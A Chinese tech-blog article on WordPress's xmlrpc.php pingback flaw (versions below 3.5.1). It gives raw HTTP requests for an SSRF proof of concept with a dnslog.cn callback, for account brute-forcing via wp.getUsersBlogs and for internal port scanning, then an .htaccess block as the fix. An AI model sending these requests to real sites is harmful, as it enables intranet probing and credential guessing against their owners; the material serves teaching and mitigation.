WordPress漏洞有何影响,如何复现并解决
Admin 2022-08-03 群英技术资讯 1559 次浏览
今天这篇我们来学习和了解“WordPress漏洞有何影响,如何复现并解决”,下文的讲解详细,步骤过程清晰,对大家进一步学习和理解“WordPress漏洞有何影响,如何复现并解决”有一定的帮助。有这方面学习需要的朋友就继续往下看吧!通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
WordPress 版本< 3.5.1
造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等
第一步:直接访问这个文件,初步判断

第二步:发现POC验证数据包
POST /xmlrpc.php HTTP/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
<param><value><string>http://www.目标.com/?p=1</string></value></param>
</params>
</methodCall>
发送数据包

验证成功 !

(一)查看系统允许的方法
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

(二)账号爆破
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>password</value></param> </params> </methodCall>
(三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ....... <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>要探测的ip和端口:http://127.0.0.1:80</string></value> </param><param><value><string>要探测的URL</string> </value></param></params> </methodCall>
(一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:
# protect xmlrpc <Files "xmlrpc.php"> Order Allow,Deny Deny from all </Files>
(二)删除根目录下的xmlrpc.php。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:mmqy2019@163.com进行举报,并提供相关证据,查实之后,将立刻删除涉嫌侵权内容。
猜你喜欢
在thinkphp中,execute()方法可以在参数中直接输入SQL语句,该方法用于执行insert或update等SQL语句,返回的结果就是SQL语句影响的记录数,语法为“$model ->execute(SQL语句)”。
在本篇文章里小编给大家整理的是关于php服务器用什么系统的相关知识点内容,有兴趣的朋友们跟着学习参考下。
在thinkphp中,create方法用于对POST提交的数据进行处理,利用表中的字段名称与表单提交的名称对应关系自动封装数据实例,该方法可以对表单进行令牌验证,放置表单重复提交。
在之前的文章中给大家带来了《PHP中应该怎样去完成时区的设置?》,其中给大家介绍了怎样在PHP中设置时区的几种方法,本篇文章我们继续来看一看PHP的相关知识,我们在PHP中应该如何获取当前的时间,希望对大家有帮助!
php性能优化的解决方法你知道怎么操作吗?性能优化可以分为两个方向,一个是页面加载的快慢,另一个是页面使用起来是否流畅。下文的讲解详细,步骤过程清晰,对大家进一步学习和理解相关知识有一定的帮助。有这方面学习需要的朋友就继续往下看吧!
成为群英会员,开启智能安全云计算之旅
立即注册关注或联系群英网络
7x24小时售前:400-678-4567
7x24小时售后:0668-2555666
24小时QQ客服
群英微信公众号
CNNIC域名投诉举报处理平台
服务电话:010-58813000
服务邮箱:service@cnnic.cn
投诉与建议:0668-2555555
Copyright © QY Network Company Ltd. All Rights Reserved. 2003-2020 群英 版权所有
增值电信经营许可证 : B1.B2-20140078 ICP核准(ICP备案)粤ICP备09006778号 域名注册商资质 粤 D3.1-20240008